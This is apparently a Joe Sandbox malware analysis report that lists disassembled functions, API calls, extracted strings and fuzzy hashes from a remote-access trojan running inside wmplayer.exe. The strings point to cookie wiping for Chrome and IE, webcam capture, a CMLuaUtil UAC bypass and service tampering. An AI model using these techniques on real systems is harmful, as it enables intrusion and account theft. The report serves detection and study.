                                                                                            • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                            • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                            Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                            • API String ID: 1133728706-4073444585
                                                                                            • Opcode ID: d82bb59f73ba21d1adf7e088d37ed553899b51bd2532a140866917cd763e441d
                                                                                            • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                            • Opcode Fuzzy Hash: d82bb59f73ba21d1adf7e088d37ed553899b51bd2532a140866917cd763e441d
                                                                                            • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                            Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                            • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                            • Opcode Fuzzy Hash: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                            • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                            Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                            • int.LIBCPMT ref: 0040FC0F
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                            • String ID: P[G
                                                                                            • API String ID: 2536120697-571123470
                                                                                            • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                            • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                            • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                            • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                            Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                            • _free.LIBCMT ref: 0044FD29
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 0044FD34
                                                                                            • _free.LIBCMT ref: 0044FD3F
                                                                                            • _free.LIBCMT ref: 0044FD93
                                                                                            • _free.LIBCMT ref: 0044FD9E
                                                                                            • _free.LIBCMT ref: 0044FDA9
                                                                                            • _free.LIBCMT ref: 0044FDB4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                            • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                            • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                            Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                            • _free.LIBCMT ref: 100092AB
                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                            • _free.LIBCMT ref: 100092B6
                                                                                            • _free.LIBCMT ref: 100092C1
                                                                                            • _free.LIBCMT ref: 10009315
                                                                                            • _free.LIBCMT ref: 10009320
                                                                                            • _free.LIBCMT ref: 1000932B
                                                                                            • _free.LIBCMT ref: 10009336
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                            • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                            • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                            Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Program Files (x86)\Windows Media Player\wmplayer.exe), ref: 00406835
                                                                                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                            • CoUninitialize.OLE32 ref: 0040688E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                            • API String ID: 3851391207-2424989193
                                                                                            • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                            • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                            Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                            • int.LIBCPMT ref: 0040FEF2
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                            • String ID: H]G
                                                                                            • API String ID: 2536120697-1717957184
                                                                                            • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                            • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                            • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                            • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                            Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                            • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                            Strings
                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                            • UserProfile, xrefs: 0040B2B4
                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                            • [Chrome Cookies not found], xrefs: 0040B308
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast
                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                            • API String ID: 2018770650-304995407
                                                                                            • Opcode ID: ee578fe998e79df25f0549cf5f4ca79d5eb27d28ea68ce1bf511d2245c481035
                                                                                            • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                            • Opcode Fuzzy Hash: ee578fe998e79df25f0549cf5f4ca79d5eb27d28ea68ce1bf511d2245c481035
                                                                                            • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                            Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe$Rmc-MKYDDH$BG
                                                                                            • API String ID: 0-289134326
                                                                                            • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                            • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                            Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __allrem.LIBCMT ref: 00439789
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                            • __allrem.LIBCMT ref: 004397BC
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                            • __allrem.LIBCMT ref: 004397F1
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1992179935-0
                                                                                            • Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                            • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                            • Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                            • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                            Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                            • __freea.LIBCMT ref: 10008A08
                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                            • __freea.LIBCMT ref: 10008A11
                                                                                            • __freea.LIBCMT ref: 10008A36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1414292761-0
                                                                                            • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                            • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                            • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                            • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                            Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __cftoe
                                                                                            • String ID:
                                                                                            • API String ID: 4189289331-0
                                                                                            • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                            • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                            • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                            • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                            Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                            • String ID: a/p$am/pm
                                                                                            • API String ID: 3509577899-3206640213
                                                                                            • Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                            • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                            • Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                            • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                            Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologSleep
                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                            • API String ID: 3469354165-462540288
                                                                                            • Opcode ID: 749b719005d2056865057d93797d2a330aa37569de42fbc52bb63ba102851032
                                                                                            • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                            • Opcode Fuzzy Hash: 749b719005d2056865057d93797d2a330aa37569de42fbc52bb63ba102851032
                                                                                            • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                            Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _strlen.LIBCMT ref: 10001607
                                                                                            • _strcat.LIBCMT ref: 1000161D
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                            • String ID:
                                                                                            • API String ID: 1922816806-0
                                                                                            • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                            • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                            • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                            • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                            Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 3594823470-0
                                                                                            • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                            • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                            • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                            • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                            Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                            Memory Dump Source
